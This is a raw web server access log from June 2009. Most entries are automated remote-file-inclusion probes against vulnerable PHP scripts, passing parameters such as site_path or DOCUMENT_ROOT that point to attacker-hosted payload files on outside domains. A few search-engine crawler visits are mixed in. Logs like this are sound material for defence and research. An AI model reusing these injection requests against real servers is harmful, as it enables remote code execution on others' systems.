80.237.154.69 - - [26/Jun/2009:03:44:39 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:45:21 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:45:24 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:45:25 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:45:30 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:45:30 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.107 - - [26/Jun/2009:03:45:53 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.42 - - [26/Jun/2009:03:46:44 -0500] "GET /logs/access_log.1157328000 HTTP/1.1" 200 488 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
131.203.76.246 - - [26/Jun/2009:03:48:15 -0500] "GET /logs/access_log.1238112000//addpost_newpoll.php?addpoll=preview&thispath=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:03:48:42 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:03:48:42 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:03:48:42 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:03:49:22 -0500] "GET /logs/access_log.1238630400/includes/ktedit/toolbar.php?dirDepth=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
201.232.54.48 - - [26/Jun/2009:03:49:47 -0500] "GET //ashnews.php?pathtoashnews=http://pemai.ucoz.com/CHID.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:03:49:47 -0500] "GET /logs//ashnews.php?pathtoashnews=http://pemai.ucoz.com/CHID.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
84.201.208.50 - - [26/Jun/2009:03:50:24 -0500] "GET //home.php?content=http://www.dracocafe.pl/sklep//components/com_sef/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
84.201.208.50 - - [26/Jun/2009:03:50:29 -0500] "GET /logs/access_log.1233705600//home.php?content=http://www.dracocafe.pl/sklep//components/com_sef/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
84.201.208.50 - - [26/Jun/2009:03:50:29 -0500] "GET /logs//home.php?content=http://www.dracocafe.pl/sklep//components/com_sef/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.201.208.50 - - [26/Jun/2009:03:50:47 -0500] "GET /logs/access_log.1242000000//home.php?content=http://www.dracocafe.pl/sklep//components/com_sef/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.107 - - [26/Jun/2009:03:51:24 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.106.179.130 - - [26/Jun/2009:03:51:42 -0500] "GET //apboard/_test_holidays.php?APB_rp=http://cedhbcs.org//menu/ivid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
87.106.179.130 - - [26/Jun/2009:03:51:42 -0500] "GET /logs//apboard/_test_holidays.php?APB_rp=http://cedhbcs.org//menu/ivid.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
80.237.154.69 - - [26/Jun/2009:03:53:10 -0500] "GET //home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:53:10 -0500] "GET /logs//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:53:10 -0500] "GET /logs/access_log.1233705600//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.247.76.181 - - [26/Jun/2009:03:53:10 -0500] "GET //add.php?APB_rp=http://cedhbcs.org//menu/ivid.txt%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:03:53:11 -0500] "GET /logs//add.php?APB_rp=http://cedhbcs.org//menu/ivid.txt%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
80.247.76.181 - - [26/Jun/2009:03:53:11 -0500] "GET /logs/access_log.1228608000//add.php?APB_rp=http://cedhbcs.org//menu/ivid.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
80.237.154.69 - - [26/Jun/2009:03:53:31 -0500] "GET /logs/access_log.1242000000//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:21 -0500] "GET /logs//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:21 -0500] "GET //home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:21 -0500] "GET /logs/access_log.1233705600//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:41 -0500] "GET //home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:41 -0500] "GET /logs/access_log.1233705600//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:41 -0500] "GET /logs//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:54:45 -0500] "GET /logs/access_log.1242000000//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:55:01 -0500] "GET /logs/access_log.1233705600//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:55:01 -0500] "GET /logs//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:55:01 -0500] "GET //home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:55:06 -0500] "GET /logs/access_log.1242000000//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:03:55:22 -0500] "GET /logs/access_log.1242000000//home.php?content=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.198.32.3 - - [26/Jun/2009:03:55:31 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
91.198.32.3 - - [26/Jun/2009:03:55:31 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
83.98.209.71 - - [26/Jun/2009:03:57:03 -0500] "GET /logs//include/lib.inc.php?site_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:03:57:03 -0500] "GET //include/lib.inc.php?site_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:03:57:03 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:03:57:03 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:03:57:27 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:03:57:27 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 322 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:03:57:27 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 295 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:03:57:27 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 322 "-""Mozilla/5.0"
66.249.68.42 - - [26/Jun/2009:04:03:56 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 200 10025 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.217 - - [26/Jun/2009:04:05:25 -0500] "GET /logs/access_log.1234828800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.17 - - [26/Jun/2009:04:05:44 -0500] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
77.221.130.17 - - [26/Jun/2009:04:05:44 -0500] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.17 - - [26/Jun/2009:04:05:44 -0500] "GET /logs/access_log.1239494400/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.17 - - [26/Jun/2009:04:05:44 -0500] "GET /logs/access_log.1240358400/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:07:17 -0500] "GET //include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:07:17 -0500] "GET /logs//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:07:19 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:07:20 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:11:04 -0500] "GET //include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:11:04 -0500] "GET /logs//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:11:05 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:11:05 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:14:37 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
163.24.136.10 - - [26/Jun/2009:04:14:51 -0500] "GET //include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
163.24.136.10 - - [26/Jun/2009:04:14:51 -0500] "GET /logs//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
163.24.136.10 - - [26/Jun/2009:04:14:52 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
163.24.136.10 - - [26/Jun/2009:04:15:06 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:15:49 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:17:04 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:17:04 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:17:04 -0500] "GET /logs/access_log.1240012800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:17:04 -0500] "GET /logs/access_log.1236038400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:17:20 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:17:20 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:17:20 -0500] "GET /logs/access_log.1240358400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.202.81.179 - - [26/Jun/2009:04:17:20 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:18:17 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:18:17 -0500] "GET /logs/access_log.1240012800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:18:17 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.203.180.144 - - [26/Jun/2009:04:18:17 -0500] "GET /logs/access_log.1236038400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
38.99.44.102 - - [26/Jun/2009:04:18:23 -0500] "GET /logs/access_log.1241222400 HTTP/1.0" 200 798010 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.202.81.179 - - [26/Jun/2009:04:18:41 -0500] "GET /logs/access_log.1242000000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:16 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:21 -0500] "GET /logs//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:29 -0500] "GET //include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:30 -0500] "GET /logs//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:30 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:04:20:31 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://jiao-hua.org//cache/idade1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.106.179.130 - - [26/Jun/2009:04:22:52 -0500] "GET /_zb_path=http://cedhbcs.org//menu/ivid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.179.130 - - [26/Jun/2009:04:22:52 -0500] "GET /logs/_zb_path=http://cedhbcs.org//menu/ivid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
212.223.162.135 - - [26/Jun/2009:04:24:01 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
212.223.162.135 - - [26/Jun/2009:04:24:01 -0500] "GET //include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.808"
38.99.44.102 - - [26/Jun/2009:04:24:15 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.23.195.160 - - [26/Jun/2009:04:27:33 -0500] "GET //include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.826"
94.23.195.160 - - [26/Jun/2009:04:27:33 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.826"
217.172.179.213 - - [26/Jun/2009:04:30:12 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
217.172.179.213 - - [26/Jun/2009:04:30:12 -0500] "GET //include/lib.inc.php?site_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.69"
94.23.195.160 - - [26/Jun/2009:04:30:48 -0500] "GET //guestbook1//admin.php?include_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
94.23.195.160 - - [26/Jun/2009:04:30:48 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.826"
89.171.190.110 - - [26/Jun/2009:04:31:15 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:15 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:19 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:24 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:27 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:30 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:43 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.110 - - [26/Jun/2009:04:31:55 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:33:09 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:33:09 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:33:09 -0500] "GET /logs/access_log.1235260800//index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:04:34:45 -0500] "GET /logs/access_log.1228608000%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:04:34:45 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:04:34:51 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:34:56 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:34:56 -0500] "GET /logs/access_log.1235260800//index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:04:34:56 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:04:36:06 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 305 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:04:36:06 -0500] "GET //includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:04:36:06 -0500] "GET /logs/access_log.1240531200//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 327 "-""Mozilla/5.0"
217.172.179.213 - - [26/Jun/2009:04:36:08 -0500] "GET //guestbook1//admin.php?include_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.69"
217.172.179.213 - - [26/Jun/2009:04:36:09 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.69"
65.55.106.116 - - [26/Jun/2009:04:36:25 -0500] "GET /logs/access_log.1181260800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [26/Jun/2009:04:45:49 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:45:49 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:45:50 -0500] "GET /logs/access_log.1235260800/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:16 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:16 -0500] "GET //config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:16 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:17 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:18 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:18 -0500] "GET //config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
